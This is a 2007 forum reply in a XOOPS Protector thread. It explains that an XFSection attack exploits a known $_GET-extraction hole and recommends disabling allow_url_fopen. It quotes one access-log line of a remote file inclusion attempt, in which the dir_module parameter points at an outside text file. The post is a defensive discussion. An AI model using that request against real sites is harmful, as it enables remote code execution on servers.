PEAK XOOPS - Re: New hack that is using XFSection

Top > XOOPS Modules >Protector >New hack that is using XFSection

Re: New hack that is using XFSection

List posts in the topic

Re: New hack that is using XFSection

msg# 1.1

depth:: 1

Previous post - Next post | Parent - Children.1 | Posted on 2007/6/9 4:49

GIJOE

Posts: 4110

hi Xooby.

This is not a new but a well-known fatal hole

minahito had already warned XF-Section has "$_GET extraction" to ohwada about 3 years ago.
But ohwada had never checked the code, then fatal vulnerability was opened 2006 Spring.

Thus, I insist "Don't install modules made by such authors".

07.218.231.178 - - [08/Jun/2007:11:42:57 +0100] "GET /modules/xfsection/modify.php?dir_module=http://www.insanmistik.org/x1.txt? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

This is a typical and dull "remote code execution".

Protector must have warned "turn allow_url_fopen off" to the administrator.
All Protector can do is just warning.

Or should Protector investigate whether such vulnerable modules are installed?

And you'd better distinct between "hack" and "crack".
"Hacking" never means illegal behaviors.

Votes:2 Average:10.00

Posts tree

New hack that is using XFSection (Xooby, 2007/6/8 21:13)
- Re: New hack that is using XFSection (GIJOE, 2007/6/9 4:49)
  - Re: New hack that is using XFSection (Xooby, 2007/6/12 19:02)
    - Re: New hack that is using XFSection (GIJOE, 2007/6/14 4:19)
      - Re: New hack that is using XFSection (Xooby, 2007/7/7 15:19)
        
        Re: New hack that is using XFSection (gigamaster, 2007/7/8 3:42)
        
        Re: New hack that is using XFSection (Xooby, 2007/7/10 1:17)
        
        Why Xoops and modules code are always full of security holes (gigamaster, 2007/7/11 4:13)
        
        Re: Why Xoops and modules code are always full of security holes (GIJOE, 2007/7/12 5:33)

Lost Password?

Register now!